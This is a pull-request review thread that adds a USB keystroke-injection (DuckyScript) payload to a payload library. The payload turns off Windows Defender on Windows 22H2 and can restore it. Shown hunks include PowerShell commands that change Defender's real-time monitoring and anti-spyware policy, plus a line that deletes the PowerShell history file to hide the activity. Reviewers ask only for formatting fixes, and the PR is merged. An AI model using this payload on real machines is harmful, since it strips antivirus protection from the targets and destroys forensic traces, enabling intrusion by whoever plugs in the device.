### PR TITLE
Disabling Defender on Win 22H2 Maschines

### PR DESCRIPTION
**Pull request by HackingMark**
You can choose between disabling/restoring with and without PS History deletion.
You could also modify the Term Windows Security Center via DEFINE

### CODE REVIEW

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt [hunk 1]
```diff
@@ -0,0 +1,74 @@
+          REM Disable Windows Defender
```
Comment (dallaswinger) [inline payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt:1]: please fix formatting (shouldn't be tabbed in)

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt [hunk 2]
```diff
@@ -0,0 +1,74 @@
...
+DEFINE ATTACK_RC Set-MpPreference -DisableRealtimeMonitoring $false; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -PropertyType DWORD -Force; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit;
+
+REM Change the Term for "Windows-Securitycenter" for your Target Language here:
+DEFINE TERM_WIN_SEC_CENTER Windows-Sicherheit
+REM CLEAN = TRUE deletes PS History, set to FALSE to run Payload without deleting History
+VAR $clean = TRUE
+
+ATTACKMODE HID
+DELAY 2000
+    FUNCTION DISABLE_WINDOWS_DEFENDER()
```
Comment (dallaswinger) [inline payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt:22]: please fix formatting (shouldn't be tabbed in)

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt [hunk 3]
```diff
@@ -0,0 +1,74 @@
...
+        ALT j
+        DELAY 500
+        IF ($clean == TRUE) THEN
+          STRINGLN ATTACK_T
+        ELSE 
+          STRINGLN ATTACK_F
+        END_IF
+
+    END_FUNCTION
+    FUNCTION RESTORE()
```
Comment (dallaswinger) [inline payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt:57]: please fix formatting (shouldn't be tabbed in)

**Review by dallaswinger — CHANGES_REQUESTED** [review]

**Review by HackingMark — COMMENTED** [review]
Formatting fixed ;)

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt (hunk 1 above)
Comment (HackingMark) [reply payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt]: Done

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt (hunk 2 above)
Comment (HackingMark) [reply payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt]: Done

File: payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt (hunk 3 above)
Comment (HackingMark) [reply payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt]: Done

**Pull request merged**